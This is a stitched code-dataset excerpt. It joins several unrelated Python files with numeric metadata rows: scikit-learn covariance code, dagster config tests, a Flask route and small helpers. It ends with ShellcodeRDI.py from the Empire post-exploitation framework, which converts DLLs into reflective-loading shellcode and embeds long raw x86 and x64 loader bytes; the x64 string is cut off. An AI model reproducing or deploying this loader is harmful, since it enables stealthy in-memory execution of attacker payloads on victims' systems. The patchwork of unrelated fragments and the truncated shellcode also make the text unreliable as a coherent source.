Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
Attributes
----------
`covariance_` : array-like, shape (n_features, n_features)
Estimated covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`shrinkage_`: float, 0 <= shrinkage <= 1
coefficient in the convex combination used for the computation
of the shrunk estimate.
Notes
-----
The regularised covariance is::
(1 - shrinkage)*cov
+ shrinkage*mu*np.identity(n_features)
where mu = trace(cov) / n_features
and shinkage is given by the OAS formula (see References)
References
----------
"Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
def fit(self, X, y=None):
""" Fits the Oracle Approximating Shrinkage covariance model
according to the given training data and parameters.
Parameters
----------
X: array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y: not used, present for API consistence purpose.
Returns
-------
self: object
Returns self.
"""
# Not calling the parent object to fit, to avoid computing the
# covariance matrix (and potentially the precision)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance, shrinkage = oas(X - self.location_, assume_centered=True)
self.shrinkage_ = shrinkage
self._set_covariance(covariance)
return self
| 32.773723 | 79 | 0.629399 | 2,295 | 17,960 | 4.80305 | 0.126362 | 0.052254 | 0.019051 | 0.020412 | 0.804228 | 0.787444 | 0.761952 | 0.755783 | 0.735281 | 0.699991 | 0 | 0.011647 | 0.268597 | 17,960 | 547 | 80 | 32.833638 | 0.827497 | 0.561581 | 0 | 0.585034 | 0 | 0 | 0.039412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0 | 0.034014 | 0 | 0.183673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0aef2aafc3dab46bc3e7cadc8c2e0733777ee9f8 | 47 | py | Python | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | 2 | 2021-05-12T13:36:46.000Z | 2021-08-15T10:35:08.000Z | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | 1 | 2021-12-28T12:49:49.000Z | 2021-12-28T12:49:49.000Z | finegrain/__init__.py | SZLSP/reid2020NAIC | d0eaee768e0be606417a27ce5ea2b3071b5a9bc2 | [
"Apache-2.0"
] | null | null | null | from .load_backbone import load_model, load_cfg | 47 | 47 | 0.87234 | 8 | 47 | 4.75 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085106 | 47 | 1 | 47 | 47 | 0.883721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c2b9bc3a8b58b01b15dbe313d2b0572b2044bf8 | 225 | py | Python | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 4 | 2020-08-01T00:34:14.000Z | 2022-02-27T06:04:12.000Z | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 1 | 2021-05-17T22:47:26.000Z | 2021-05-25T14:26:06.000Z | roundup/anypy/urllib_.py | zware/bpo-roundup | 68573d196f9a01786414d3b235252b9c857c3e08 | [
"MIT"
] | 3 | 2020-11-13T17:43:43.000Z | 2022-02-27T06:04:13.000Z |
try:
# Python 3+
from urllib.parse import quote, urlencode, urlparse, parse_qs, urlunparse
except:
# Python 2.5-2.7
from urllib import quote, urlencode
from urlparse import urlparse, parse_qs, urlunparse
| 25 | 77 | 0.715556 | 31 | 225 | 5.129032 | 0.516129 | 0.125786 | 0.251572 | 0.314465 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028249 | 0.213333 | 225 | 8 | 78 | 28.125 | 0.870057 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c7abf420a8a5426ff115890e9ef47770ee51350 | 121 | py | Python | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null | modules/publishers/base.py | atthealchemist/graduation-project-system-backend | 1215425208e1708f1ed3d008ea7cffebb36f8e30 | [
"MIT"
] | null | null | null |
class BasePublisher:
def publish(self):
pass
def __init__(self, params):
self.params = params
| 13.444444 | 31 | 0.603306 | 13 | 121 | 5.307692 | 0.615385 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.31405 | 121 | 8 | 32 | 15.125 | 0.831325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
7c80ad671e70e750b7edbb9a7a7796d2c69ecb9d | 2,977 | py | Python | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster_tests/core_tests/config_types_tests/test_source_types.py | chasleslr/dagster | 88907f9473fb8e7a9b1af9a0a8b349d42f4b8153 | [
"Apache-2.0"
] | null | null | null | import os
from dagster import Array, IntSource, Noneable, StringSource
from dagster.config.validate import process_config
from dagster.core.test_utils import environ
def test_string_source():
assert process_config(StringSource, "foo").success
assert not process_config(StringSource, 1).success
assert not process_config(StringSource, {"env": 1}).success
assert "DAGSTER_TEST_ENV_VAR" not in os.environ
assert not process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
with environ({"DAGSTER_TEST_ENV_VAR": "baz"}):
assert process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert process_config(StringSource, {"env": "DAGSTER_TEST_ENV_VAR"}).value == "baz"
def test_int_source():
assert process_config(IntSource, 1).success
assert not process_config(IntSource, "foo").success
assert not process_config(IntSource, {"env": 1}).success
assert "DAGSTER_TEST_ENV_VAR" not in os.environ
assert not process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
with environ({"DAGSTER_TEST_ENV_VAR": "4"}):
assert process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).value == 4
with environ({"DAGSTER_TEST_ENV_VAR": "four"}):
assert not process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).success
assert (
'Value "four" stored in env variable "DAGSTER_TEST_ENV_VAR" cannot '
"be coerced into an int."
) in process_config(IntSource, {"env": "DAGSTER_TEST_ENV_VAR"}).errors[0].message
def test_noneable_string_source_array():
assert process_config(Noneable(Array(StringSource)), []).success
assert process_config(Noneable(Array(StringSource)), None).success
assert (
'You have attempted to fetch the environment variable "DAGSTER_TEST_ENV_VAR" '
"which is not set. In order for this execution to succeed it must be set in "
"this environment."
) in process_config(
Noneable(Array(StringSource)), ["test", {"env": "DAGSTER_TEST_ENV_VAR"}]
).errors[
0
].message
with environ({"DAGSTER_TEST_ENV_VAR": "baz"}):
assert process_config(
Noneable(Array(StringSource)), ["test", {"env": "DAGSTER_TEST_ENV_VAR"}]
).success
| 41.347222 | 91 | 0.700034 | 389 | 2,977 | 5.11054 | 0.154242 | 0.084507 | 0.15493 | 0.188129 | 0.834004 | 0.821429 | 0.671026 | 0.671026 | 0.66499 | 0.618209 | 0 | 0.004137 | 0.188109 | 2,977 | 71 | 92 | 41.929577 | 0.81837 | 0 | 0 | 0.425926 | 0 | 0 | 0.343635 | 0.02956 | 0 | 0 | 0 | 0 | 0.407407 | 1 | 0.055556 | true | 0 | 0.074074 | 0 | 0.12963 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c8e163b7e677628ed1ec1ed3c6fe231a1a34bf8 | 213 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/flaskserver/tests/blueprints/home/routes.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 2 | 2019-05-09T07:21:25.000Z | 2019-08-05T06:37:53.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/servers/flaskserver/tests/blueprints/home/routes.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 664 | 2018-12-19T12:43:44.000Z | 2019-08-23T04:24:42.000Z | Jumpscale/servers/webserver/tests/blueprints/home/routes.py | threefoldtech/jumpscale10 | 5fb073a82aeb0e66fc7d9660c45a1e31bc094bfa | [
"Apache-2.0"
] | 7 | 2019-05-03T07:14:37.000Z | 2019-08-05T12:36:52.000Z | from flask import render_template
from blueprints.home import blueprint
from Jumpscale import j
@blueprint.route("/", methods=["GET"])
def route_index():
# j.shell()
return render_template("index.html")
| 21.3 | 40 | 0.737089 | 28 | 213 | 5.5 | 0.642857 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140845 | 213 | 9 | 41 | 23.666667 | 0.84153 | 0.042254 | 0 | 0 | 0 | 0 | 0.069307 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.5 | 0.166667 | 0.833333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
7cb0e08c65bfafcd5955705e10c63f5e6a4a70f3 | 32 | py | Python | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | null | null | null | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | 2 | 2020-01-15T19:11:00.000Z | 2020-01-19T15:36:10.000Z | topsis/__init__.py | SAH-UJA/topsis | e83b0862768118f1298fbc122c6c057a53ed291f | [
"MIT"
] | null | null | null | from topsis.topsis import Topsis | 32 | 32 | 0.875 | 5 | 32 | 5.6 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ccd458aea7875e4734ea709e662eaa39a59abc9 | 16,776 | py | Python | lib/common/ShellcodeRDI.py | terrorizer1980/Empire | 9259e5106986847d2bb770c4289c0c0f1adf2344 | [
"BSD-3-Clause"
] | 49 | 2015-09-02T15:20:09.000Z | 2022-03-05T18:18:23.000Z | lib/common/ShellcodeRDI.py | rmusser01/Empire | c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556 | [
"BSD-3-Clause"
] | 1 | 2020-11-04T08:15:12.000Z | 2020-11-04T08:15:12.000Z | lib/common/ShellcodeRDI.py | InfinitelyFreedom/Empire | 3a922f60d92658fb716efb3be5a1c15074114766 | [
"BSD-3-Clause"
] | 24 | 2015-09-08T11:45:23.000Z | 2022-02-07T23:53:58.000Z | #!/usr/bin/python3
# Author: Nick Landers (@monogas)
from struct import pack
import pefile
def is64BitDLL(bytes):
pe = pefile.PE(data=bytes, fast_load=True)
return (pe.OPTIONAL_HEADER.Magic == 0x20b)
ror = lambda val, r_bits, max_bits: \
((val & (2 ** max_bits - 1)) >> r_bits % max_bits) | \
(val << (max_bits - (r_bits % max_bits)) & (2 ** max_bits - 1))
def HashFunctionName(name, module=None):
function = name.encode('UTF-16LE') + b'\x00'
if (module):
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
functionHash = 0
for b in function:
functionHash = ror(functionHash, 13, 32)
functionHash += b
moduleHash = 0
for b in module:
moduleHash = ror(moduleHash, 13, 32)
moduleHash += b
functionHash += moduleHash
if functionHash > 0xFFFFFFFF: functionHash -= 0x100000000
else:
functionHash = 0
for b in function:
functionHash = ror(functionHash, 13, 32)
functionHash += b
return functionHash
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
rdiShellcode32 = b"\x83\xEC\x48\x83\x64\x24\x18\x00\xB9\x4C\x77\x26\x07\x53\x55\x56\x57\x33\xF6\xE8\x22\x04\x00\x00\xB9\x49\xF7\x02\x78\x89\x44\x24\x1C\xE8\x14\x04\x00\x00\xB9\x58\xA4\x53\xE5\x89\x44\x24\x20\xE8\x06\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x8B\xE8\xE8\xFA\x03\x00\x00\xB9\xAF\xB1\x5C\x94\x89\x44\x24\x2C\xE8\xEC\x03\x00\x00\xB9\x33\x00\x9E\x95\x89\x44\x24\x30\xE8\xDE\x03\x00\x00\x8B\xD8\x8B\x44\x24\x5C\x8B\x78\x3C\x03\xF8\x89\x7C\x24\x10\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\xB8\x03\x00\x00\xB8\x4C\x01\x00\x00\x66\x39\x47\x04\x75\xEE\xF6\x47\x38\x01\x75\xE8\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x85\xD2\x74\x22\x8D\x4F\x24\x03\xC8\x83\x79\x04\x00\x8B\x01\x75\x05\x03\x47\x38\xEB\x03\x03\x41\x04\x3B\xC6\x0F\x47\xF0\x83\xC1\x28\x83\xEA\x01\x75\xE3\x8D\x44\x24\x34\x50\xFF\xD3\x8B\x44\x24\x38\x8B\x5F\x50\x8D\x50\xFF\x8D\x48\xFF\xF7\xD2\x48\x03\xCE\x03\xC3\x23\xCA\x23\xC2\x3B\xC1\x75\x97\x6A\x04\x68\x00\x30\x00\x00\x53\x6A\x00\xFF\xD5\x8B\x77\x54\x8B\xD8\x8B\x44\x24\x5C\x33\xC9\x89\x44\x24\x14\x8B\xD3\x33\xC0\x89\x5C\x24\x18\x40\x89\x44\x24\x24\x85\xF6\x74\x37\x8B\x6C\x24\x6C\x8B\x5C\x24\x14\x23\xE8\x4E\x85\xED\x74\x19\x8B\xC7\x2B\x44\x24\x5C\x3B\xC8\x73\x0F\x83\xF9\x3C\x72\x05\x83\xF9\x3E\x76\x05\xC6\x02\x00\xEB\x04\x8A\x03\x88\x02\x41\x43\x42\x85\xF6\x75\xD7\x8B\x5C\x24\x18\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x74\x38\x83\xC7\x2C\x03\xCF\x8B\x7C\x24\x5C\x8B\x51\xF8\x48\x8B\x31\x03\xD3\x8B\x69\xFC\x03\xF7\x89\x44\x24\x5C\x85\xED\x74\x0F\x8A\x06\x88\x02\x42\x46\x83\xED\x01\x75\xF5\x8B\x44\x24\x5C\x83\xC1\x28\x85\xC0\x75\xD5\x8B\x7C\x24\x10\x8B\xB7\x80\x00\x00\x00\x03\xF3\x89\x74\x24\x14\x8B\x46\x0C\x85\xC0\x74\x7D\x03\xC3\x50\xFF\x54\x24\x20\x8B\x6E\x10\x8B\xF8\x8B\x06\x03\xEB\x03\xC3\x89\x44\x24\x5C\x83\x7D\x00\x00\x74\x4F\x8B\x74\x24\x20\x8B\x08\x85\xC9\x74\x1E\x79\x1C\x8B\x47\x3C\x0F\xB7\xC9\x8B\x44\x38\x78\x2B\x4C\x38\x10\x8B\x44\x38\x1C\x8D\x04\x88\x8B\x04\x38\x03\xC7\xEB\x0C\x8B\x45\x00\x83\xC0\x02\x03\xC3\x50\x57\xFF\xD6\x89\x45\x00\x83\xC5\x04\x8B\x44\x24\
x5C\x83\xC0\x04\x89\x44\x24\x5C\x83\x7D\x00\x00\x75\xB9\x8B\x74\x24\x14\x8B\x46\x20\x83\xC6\x14\x89\x74\x24\x14\x85\xC0\x75\x87\x8B\x7C\x24\x10\x8B\xEB\x2B\x6F\x34\x83\xBF\xA4\x00\x00\x00\x00\x0F\x84\xAA\x00\x00\x00\x8B\x97\xA0\x00\x00\x00\x03\xD3\x89\x54\x24\x5C\x8D\x4A\x04\x8B\x01\x89\x4C\x24\x14\x85\xC0\x0F\x84\x8D\x00\x00\x00\x8B\x32\x8D\x78\xF8\x03\xF3\x8D\x42\x08\xD1\xEF\x89\x44\x24\x20\x74\x60\x6A\x02\x8B\xD8\x5A\x0F\xB7\x0B\x4F\x66\x8B\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x74\x06\x66\x83\xF8\x03\x75\x0B\x81\xE1\xFF\x0F\x00\x00\x01\x2C\x31\xEB\x27\x66\x3B\x44\x24\x24\x75\x11\x81\xE1\xFF\x0F\x00\x00\x8B\xC5\xC1\xE8\x10\x66\x01\x04\x31\xEB\x0F\x66\x3B\xC2\x75\x0A\x81\xE1\xFF\x0F\x00\x00\x66\x01\x2C\x31\x03\xDA\x85\xFF\x75\xB1\x8B\x5C\x24\x18\x8B\x54\x24\x5C\x8B\x4C\x24\x14\x03\x11\x89\x54\x24\x5C\x8D\x4A\x04\x8B\x01\x89\x4C\x24\x14\x85\xC0\x0F\x85\x77\xFF\xFF\xFF\x8B\x7C\x24\x10\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x85\xC0\x0F\x84\xB7\x00\x00\x00\x8B\x74\x24\x5C\x8D\x6F\x3C\x03\xE9\x48\x83\x7D\xEC\x00\x89\x44\x24\x24\x0F\x86\x94\x00\x00\x00\x8B\x4D\x00\x33\xD2\x42\x8B\xC1\xC1\xE8\x1D\x23\xC2\x8B\xD1\xC1\xEA\x1E\x83\xE2\x01\xC1\xE9\x1F\x85\xC0\x75\x18\x85\xD2\x75\x07\x6A\x08\x5E\x6A\x01\xEB\x05\x6A\x04\x5E\x6A\x02\x85\xC9\x58\x0F\x44\xF0\xEB\x2C\x85\xD2\x75\x17\x85\xC9\x75\x04\x6A\x10\xEB\x15\x85\xD2\x75\x0B\x85\xC9\x74\x18\xBE\x80\x00\x00\x00\xEB\x11\x85\xC9\x75\x05\x6A\x20\x5E\xEB\x08\x6A\x40\x85\xC9\x58\x0F\x45\xF0\x8B\x4D\x00\x8B\xC6\x0D\x00\x02\x00\x00\x81\xE1\x00\x00\x00\x04\x0F\x44\xC6\x8B\xF0\x8D\x44\x24\x28\x50\x8B\x45\xE8\x56\xFF\x75\xEC\x03\xC3\x50\xFF\x54\x24\x3C\x85\xC0\x0F\x84\xEC\xFC\xFF\xFF\x8B\x44\x24\x24\x83\xC5\x28\x85\xC0\x0F\x85\x52\xFF\xFF\xFF\x8B\x77\x28\x6A\x00\x6A\x00\x6A\xFF\x03\xF3\xFF\x54\x24\x3C\x33\xC0\x40\x50\x50\x53\xFF\xD6\x83\x7C\x24\x60\x00\x74\x7C\x83\x7F\x7C\x00\x74\x76\x8B\x4F\x78\x03\xCB\x8B\x41\x18\x85\xC0\x74\x6A\x83\x79\x14\x00\x74\x64\x8B\x69\x20\x8B\x79\x24\x03\xEB\x83\x64\x24\x5C\x00\x03\xFB\x85\xC0\x74\x51\x8B\x75\x00\x03\
xF3\x33\xD2\x0F\xBE\x06\xC1\xCA\x0D\x03\xD0\x46\x80\x7E\xFF\x00\x75\xF1\x39\x54\x24\x60\x74\x16\x8B\x44\x24\x5C\x83\xC5\x04\x40\x83\xC7\x02\x89\x44\x24\x5C\x3B\x41\x18\x72\xD0\xEB\x1F\x0F\xB7\x17\x83\xFA\xFF\x74\x17\x8B\x41\x1C\xFF\x74\x24\x68\xFF\x74\x24\x68\x8D\x04\x90\x8B\x04\x18\x03\xC3\xFF\xD0\x59\x59\x8B\xC3\x5F\x5E\x5D\x5B\x83\xC4\x48\xC3\x83\xEC\x10\x64\xA1\x30\x00\x00\x00\x53\x55\x56\x8B\x40\x0C\x57\x89\x4C\x24\x18\x8B\x70\x0C\xE9\x8A\x00\x00\x00\x8B\x46\x30\x33\xC9\x8B\x5E\x2C\x8B\x36\x89\x44\x24\x14\x8B\x42\x3C\x8B\x6C\x10\x78\x89\x6C\x24\x10\x85\xED\x74\x6D\xC1\xEB\x10\x33\xFF\x85\xDB\x74\x1F\x8B\x6C\x24\x14\x8A\x04\x2F\xC1\xC9\x0D\x3C\x61\x0F\xBE\xC0\x7C\x03\x83\xC1\xE0\x03\xC8\x47\x3B\xFB\x72\xE9\x8B\x6C\x24\x10\x8B\x44\x2A\x20\x33\xDB\x8B\x7C\x2A\x18\x03\xC2\x89\x7C\x24\x14\x85\xFF\x74\x31\x8B\x28\x33\xFF\x03\xEA\x83\xC0\x04\x89\x44\x24\x1C\x0F\xBE\x45\x00\xC1\xCF\x0D\x03\xF8\x45\x80\x7D\xFF\x00\x75\xF0\x8D\x04\x0F\x3B\x44\x24\x18\x74\x20\x8B\x44\x24\x1C\x43\x3B\x5C\x24\x14\x72\xCF\x8B\x56\x18\x85\xD2\x0F\x85\x6B\xFF\xFF\xFF\x33\xC0\x5F\x5E\x5D\x5B\x83\xC4\x10\xC3\x8B\x74\x24\x10\x8B\x44\x16\x24\x8D\x04\x58\x0F\xB7\x0C\x10\x8B\x44\x16\x1C\x8D\x04\x88\x8B\x04\x10\x03\xC2\xEB\xDB"
rdiShellcode64 = b"\x48\x8B\xC4\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x53\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x83\xEC\x78\x83\x60\x08\x00\x48\x8B\xE9\xB9\x4C\x77\x26\x07\x44\x8B\xFA\x33\xDB\xE8\xA4\x04\x00\x00\xB9\x49\xF7\x02\x78\x4C\x8B\xE8\xE8\x97\x04\x00\x00\xB9\x58\xA4\x53\xE5\x48\x89\x44\x24\x20\xE8\x88\x04\x00\x00\xB9\x10\xE1\x8A\xC3\x48\x8B\xF0\xE8\x7B\x04\x00\x00\xB9\xAF\xB1\x5C\x94\x48\x89\x44\x24\x30\xE8\x6C\x04\x00\x00\xB9\x33\x00\x9E\x95\x48\x89\x44\x24\x28\x4C\x8B\xE0\xE8\x5A\x04\x00\x00\x48\x63\x7D\x3C\x4C\x8B\xD0\x48\x03\xFD\x81\x3F\x50\x45\x00\x00\x74\x07\x33\xC0\xE9\x2D\x04\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x75\xEE\x41\xBE\x01\x00\x00\x00\x44\x84\x77\x38\x75\xE2\x0F\xB7\x47\x06\x0F\xB7\x4F\x14\x44\x8B\x4F\x38\x85\xC0\x74\x2C\x48\x8D\x57\x24\x44\x8B\xC0\x48\x03\xD1\x8B\x4A\x04\x85\xC9\x75\x07\x8B\x02\x49\x03\xC1\xEB\x04\x8B\x02\x03\xC1\x48\x3B\xC3\x48\x0F\x47\xD8\x48\x83\xC2\x28\x4D\x2B\xC6\x75\xDE\x48\x8D\x4C\x24\x38\x41\xFF\xD2\x44\x8B\x44\x24\x3C\x44\x8B\x4F\x50\x41\x8D\x40\xFF\xF7\xD0\x41\x8D\x50\xFF\x41\x03\xD1\x49\x8D\x48\xFF\x48\x23\xD0\x48\x03\xCB\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x48\x3B\xD1\x0F\x85\x6B\xFF\xFF\xFF\x33\xC9\x41\x8B\xD1\x41\xB8\x00\x30\x00\x00\x44\x8D\x49\x04\xFF\xD6\x44\x8B\x47\x54\x33\xD2\x48\x8B\xF0\x4C\x8B\xD5\x48\x8B\xC8\x44\x8D\x5A\x02\x4D\x85\xC0\x74\x3F\x44\x8B\x8C\x24\xE0\x00\x00\x00\x45\x23\xCE\x4D\x2B\xC6\x45\x85\xC9\x74\x19\x48\x8B\xC7\x48\x2B\xC5\x48\x3B\xD0\x73\x0E\x48\x8D\x42\xC4\x49\x3B\xC3\x76\x05\xC6\x01\x00\xEB\x05\x41\x8A\x02\x88\x01\x49\x03\xD6\x4D\x03\xD6\x49\x03\xCE\x4D\x85\xC0\x75\xCC\x44\x0F\xB7\x57\x06\x0F\xB7\x47\x14\x4D\x85\xD2\x74\x38\x48\x8D\x4F\x2C\x48\x03\xC8\x8B\x51\xF8\x4D\x2B\xD6\x44\x8B\x01\x48\x03\xD6\x44\x8B\x49\xFC\x4C\x03\xC5\x4D\x85\xC9\x74\x10\x41\x8A\x00\x4D\x03\xC6\x88\x02\x49\x03\xD6\x4D\x2B\xCE\x75\xF0\x48\x83\xC1\x28\x4D\x85\xD2\x75\xCF\x8B\x9F\x90\x00\x00\x00\x48\x03\xDE\x8B\x43\x0C\x85\xC0\x0F\x84\x8A\x00\x00\x00\x48\x8B\x6C\x24\x20\x8B\xC8\x48\
x03\xCE\x41\xFF\xD5\x44\x8B\x3B\x4C\x8B\xE0\x44\x8B\x73\x10\x4C\x03\xFE\x4C\x03\xF6\xEB\x49\x49\x83\x3F\x00\x7D\x29\x49\x63\x44\x24\x3C\x41\x0F\xB7\x17\x42\x8B\x8C\x20\x88\x00\x00\x00\x42\x8B\x44\x21\x10\x42\x8B\x4C\x21\x1C\x48\x2B\xD0\x49\x03\xCC\x8B\x04\x91\x49\x03\xC4\xEB\x0F\x49\x8B\x16\x49\x8B\xCC\x48\x83\xC2\x02\x48\x03\xD6\xFF\xD5\x49\x89\x06\x49\x83\xC6\x08\x49\x83\xC7\x08\x49\x83\x3E\x00\x75\xB1\x8B\x43\x20\x48\x83\xC3\x14\x85\xC0\x75\x8C\x44\x8B\xBC\x24\xC8\x00\x00\x00\x44\x8D\x70\x01\x4C\x8B\x64\x24\x28\x4C\x8B\xCE\x41\xBD\x02\x00\x00\x00\x4C\x2B\x4F\x30\x83\xBF\xB4\x00\x00\x00\x00\x0F\x84\x95\x00\x00\x00\x8B\x97\xB0\x00\x00\x00\x48\x03\xD6\x8B\x42\x04\x85\xC0\x0F\x84\x81\x00\x00\x00\xBB\xFF\x0F\x00\x00\x44\x8B\x02\x4C\x8D\x5A\x08\x44\x8B\xD0\x4C\x03\xC6\x49\x83\xEA\x08\x49\xD1\xEA\x74\x59\x41\x0F\xB7\x0B\x4D\x2B\xD6\x0F\xB7\xC1\x66\xC1\xE8\x0C\x66\x83\xF8\x0A\x75\x09\x48\x23\xCB\x4E\x01\x0C\x01\xEB\x34\x66\x83\xF8\x03\x75\x09\x48\x23\xCB\x46\x01\x0C\x01\xEB\x25\x66\x41\x3B\xC6\x75\x11\x48\x23\xCB\x49\x8B\xC1\x48\xC1\xE8\x10\x66\x42\x01\x04\x01\xEB\x0E\x66\x41\x3B\xC5\x75\x08\x48\x23\xCB\x66\x46\x01\x0C\x01\x4D\x03\xDD\x4D\x85\xD2\x75\xA7\x8B\x42\x04\x48\x03\xD0\x8B\x42\x04\x85\xC0\x75\x84\x0F\xB7\x6F\x06\x0F\xB7\x47\x14\x48\x85\xED\x0F\x84\xCF\x00\x00\x00\x8B\x9C\x24\xC0\x00\x00\x00\x4C\x8D\x77\x3C\x4C